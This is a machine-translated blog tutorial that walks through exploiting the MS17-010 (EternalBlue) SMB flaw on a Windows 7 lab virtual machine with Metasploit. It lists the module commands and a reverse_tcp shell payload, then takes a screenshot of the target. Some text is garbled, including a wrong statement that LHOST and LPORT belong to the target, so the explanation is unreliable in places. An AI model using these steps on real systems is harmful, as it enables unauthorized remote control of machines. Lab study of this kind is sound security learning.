MSF practice - harm of ms17-010 vulnerability

Today, let's continue to introduce the relevant knowledge of penetration testing , The main content of this paper is MSF Actual penetration test win7 host .

disclaimer ：
The content introduced in this article is only for learning and communication , It is strictly prohibited to use the technology in the text for illegal acts , Otherwise, you will bear all serious consequences ！
Again ： It is forbidden to perform penetration tests on unauthorized equipment ！

One 、MS17-010 Vulnerability profile

2017 year 4 month 14 Japan , Hacker groups Shadow Brokers Released a large number of cyber attack tools , Among them is “ Eternal Blue ” Tools , The tool leverages Windows Systematic SMB Loophole , Thus, you can obtain the highest permission of the system . That year 5 month 12 Japan , Other hackers take advantage of “ Eternal Blue ” Loophole , Made wannacry The blackmail virus , Many enterprises around the world 、 Colleges and universities have been recruited on the intranet .
Blue hole of eternity , stay MSF The corresponding in is the number MS17-010 Exploit module .

Two 、MSF Module selection and use

First , Let's choose MSF Module , Carry out orders ：

search name:ms17-010

The results are shown below ：

ad locum , We select the... In the above figure 0 A module , Carry out orders ：

use exploit/windows/smb/ms17_010_eternalblue

After module selection , We carry out orders ：

show options

You can view the parameters of the attack module , The results are shown below ：

As can be seen from the above figure , At present, most of our attack parameters have been set , What we need to set ourselves up is RHOSTS, Carry out orders ：

set RHOSTS 192.168.136.77

In the above order RHOSTS The parameter represents the target host , That is, the equipment to be tested for penetration , We set this parameter to one Windows7 Of Vmware virtual machine .

3、 ... and 、 Attack payload settings

Next , We also need to set the attack payload .
We can simply understand it as , The function of the previous module is to choose which way to attack the penetration system , And the attack payload （Payload） That is, what to do after the success of the infiltration system .
In the new version of MSF in , When we select this module , Will automatically help us configure the attack payload , As shown below ：

Notice in the picture above , We used reverse_tcp Attack payload of , This attack payload after the attack is successful , It will feed back a message to the specified port of the specified device TCP link , And it allows us to execute SHELL command . Above Payload Medium LHOST and LPORT That is... Of the target device IP Address and port number , ad locum MSF Help us to LHOST Automatically set to the... Of this machine IP Address ,LPORT Auto set to 4444（ An unusual port number ）.

Four 、MSF Perform penetration and effect viewing

After completing the above configuration , We carry out orders ：

run

Indicates that the module is executed , The execution result of this command is as follows ：

Next , So let's test that out MSF Results of penetration tests , We are bouncing back SHELL in , Execute the command to test , The results are shown below ：

You can see , We can carry out windows Operation command of .
after , We carry out orders ：

screenstot

This command allows us to get the current screen status , And save it as a picture , The execution result of this command is as follows ：

It can be seen from the figure above , The screenshot of the target host is saved in /root/ Next , We open the picture , The results are shown below ：

above , It fully explains MS17-010 The harm of loopholes ！
Originality is not easy. , Reprint please explain the source ：https://blog.csdn.net/weixin_40228200